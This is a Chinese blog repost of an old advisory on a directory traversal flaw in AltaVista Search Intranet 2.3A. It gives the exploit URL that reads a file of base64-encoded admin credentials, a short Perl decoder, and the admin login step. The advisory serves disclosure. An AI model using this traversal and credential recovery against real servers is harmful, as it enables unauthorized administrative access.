AltaVista 搜索引擎目录遍历问题

最新推荐文章于 2024-10-08 18:44:20 发布
最新推荐文章于 2024-10-08 18:44:20 发布
阅读量210 收藏
点赞数
分类专栏: SEO&SEM 文章标签: 搜索引擎 Youtube Mobile Windows Mobile 医疗

受影响系统:

 

  AltaVista Search Intranet 2.3A

 

描述:

 

  AltaVista Search engine在9000端口开启了一个webserver,用来监听搜索请求.主要的搜索

 

  函数(cgi-bin/query)中有一个模板变量{mss},它将接受搜索请求中的包含的单个"../"字符

 

  串,提供对上一层目录('http')中所有文档的访问权限.

 

  这些文档可能包含很多管理信息,包括用来进行远程管理的用户名和口令.这些用户名和口令

 

  被base-64编码,可以很容易得被恢复成纯文本方式,因此攻击者可以获得远程管理这个搜索引

 

  擎的权力.

 

  < 发现者: rudi carell (rudicarell@HOTMAIL.COM) >

 

测试方法:

 

  警 告

 

  以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

 

  通过执行 http://target:9000/cgi-bin/query?../logs/mgtstate

 

  可以获得mgtstate文件的内容,这里面包含有远程管理的用户名和口令.

 

  利用下面的小程序就可以将其解码,得到用户名和口令:

 

  #!/usr/bin/perl

 

  use MIME::Base64;

 

  print decode_base64("$ARGV[0]"), "\n";

 

  然后执行 http://target:9000/cgi-bin/mgt

 

  输入得到的用户名和口令就可以远程管理该搜索引擎

iteye_17896
关注
专栏目录
Atlassian JIRA服务器模板注入漏洞(CVE-2019-11581)
qq_44504968的博客
04-06 1193
Atlassian JIRA服务器模板注入漏洞(CVE-2019-11581)一、漏洞原理二、漏洞风险等级三、漏洞影响范围四、实验环境4.1靶机:4.2攻击机:五、漏洞复现六、漏洞修复方案 一、漏洞原理 Atlassian Jira是企业广泛使用的项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。 因atlassian-jira/WEB-INF/classes/com/atlassian/jira/web/action/user/Contact
关于搜索引擎
雪雪
03-17 1403
一.什么是搜索引擎? 广义的搜索引擎泛指网络(尤其是万维网)上提供信息检索服务的工具或系统,即在因特网上或通过因特网响应用户的搜索请求,返回相应查询结果的信息技术和系统. 狭义的搜索引擎主要指利用网络自动搜索软件或人工方式,对万维网信息资源进行采集,分析与标引,并将索引信息组织成数据库,以网站形式为网络用户提供检索服务的一类信息服务系统. 概括的说:搜索引擎就是WWW网络环境中的一套...
搜索引擎——原理
linghugoolge的博客
11-16 1367
目录 【1】搜索引擎概述 【2】搜索引擎的基础技术 【3】搜索引擎的平台基础 【4】搜索结果的改善优化 __________________________________________________ 【1】搜索引擎概述 过去的15年间,互联网信息急剧膨胀,靠人工的方式去筛选获取有用信息不再可能,因此搜索引擎应运而生。根据其发展,可以将其划为四个时代。 分类目录。yahoo是这...
搜索引擎介绍
~ Caesar's wish书屋 ~
02-06 5831
自从1994年问世以来,搜索引擎逐渐成为了人们获取Internet信息资源的主要方式,相关搜索引擎网站也逐渐成为Web用户使用Internet时的首选访问站点之一,另外搜索引擎和实时通讯、电子邮件等服务已经成为当今各大门户网站用来吸引用户访问的三大主要方式。据iResearch艾瑞咨询报告说明,2009年中国搜索引擎市场规模达69.6亿元,年同比增38.5%。搜索引擎市场规模在网络广告市场规模占比
搜索引擎和知识图谱那些事
热门推荐
Java技术江湖
09-15 1万+
搜索引擎和知识图谱那些事 分类: 知识图谱(14) 版权声明:本文为博主原创文章,转载请注明CSDN博客源地址!共同学习,一起进步~ 目录(?)[+] 这是一篇基础性文章,主要介绍搜索引擎和知识图谱的一些原理、发展经历和应用等知识。希望文章对你有所帮助~如果有错误或不足之处,还请海涵。(参考资料见后) 一. 搜索引擎 (一).搜索引擎的四个时代 ...
搜索引擎的工作机制[图]
lohocc的专栏
03-19 950
转自:http://news.xinhuanet.com/newmedia/2006-07/10/content_4813163.htm 搜索引擎是一种依靠技术取胜的产品,搜索引擎的各个组成部分,包括页面搜集器、索引器、检索器等,都是搜索引擎产品提供商进行比拼的着力点。     近几年,搜索引擎的商业化取得了巨大的成功,如著名搜索引擎公司Google、Yahoo(本文中提到Yahoo时,特
搜索引擎基本原理
dingbbin的专栏
12-21 1028
参考链接 http://toutiao.com/news/6230386103279419905/ 目录 【1】搜索引擎概述 【2】搜索引擎的基础技术 【3】搜索引擎的平台基础 【4】搜索结果的改善优化 __________________________________________________ 【1】搜索引擎概述 过去的15年间
搜索引擎的基本工作原理
aaaaa2689的博客
05-29 1151
了解搜索引擎的基本工作原理 1.搜索引擎的概念在浩瀚的网络资源中,搜素引擎(Search Engine)是一种网上信息检索工具,它能帮助用户迅速而全面地找到所需要的信息。我们这样对搜索引擎进行定义:搜索引擎是一种能够通过因特网接受用户的查询命令,并向用户提供符合其查询要求的信息资源网址的系统。据统计,搜索引擎搜索仅次于电子邮件的应用。目前网上比较有影响的中文搜索工具有:goog...
Google搜索引擎原理
12-04 885
来源:csdn 作者:蝶澈 2007-12-25 22:36 这篇文章中,介绍了google,它是一个大型的搜索引擎(of a large-scale search engine)的原型,搜索引擎在超文本中应用广泛。Google的设计能够高效地抓网页并建立索引,它的查询结果比其它现有系统都高明。这个原型的全文 和超连接的数据库至少包含24'000'000个网页。我们可以从http://goo
搜索引擎从入门到精通.pdf
10-08
1. 基于蜘蛛程序的机器人搜索引擎,如AltaVista、Excite、Inktomi、FAST、Lycos、Google以及中国的百度和OpenFind。这类搜索引擎利用自动程序(蜘蛛)遍历Web,抓取网页内容并建立索引,然后根据用户查询返回结果。...
与ZoomEye功能类似的搜索引擎还有哪些?(渗透课作业)
2303_79610394的博客
10-08 261
渗透课作业
逆变器PQ控制模型、逆变器并网模型(Simulink) 直流侧电压650V~2000V均可 交流测电压为380V 有功功率和无功
10-10
逆变器PQ控制模型、逆变器并网模型(Simulink) 直流侧电压650V~2000V均可 交流测电压为380V 有功功率和无功功率可达10kW或10kVar,甚至更高
SpringBoot+Vue工厂生产设备维护管理系统答辩PPT.ppt
10-10
计算机毕业设计答辩PPT
CPA 税法 马兆瑞 基础班 第10章-本章概述-PPT-8页.pdf
最新发布
10-10
CPA 税法 马兆瑞 基础班 第10章-本章概述-PPT-8页.pdf
CCS软件之工程模板的创建
10-10
工程模板创建的基础文件
探索Yahoo分类目录:Google搜索引擎与竞品比较
其他搜索引擎AltaVista 和 Excite 也曾在历史上扮演过重要角色,前者由 DEC 公司在1995年推出,后者由斯坦福大学创办的Excite成立于1993年。MetaCrawler也是一个知名的元搜索引擎,展示了搜索引擎多样化的形态。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值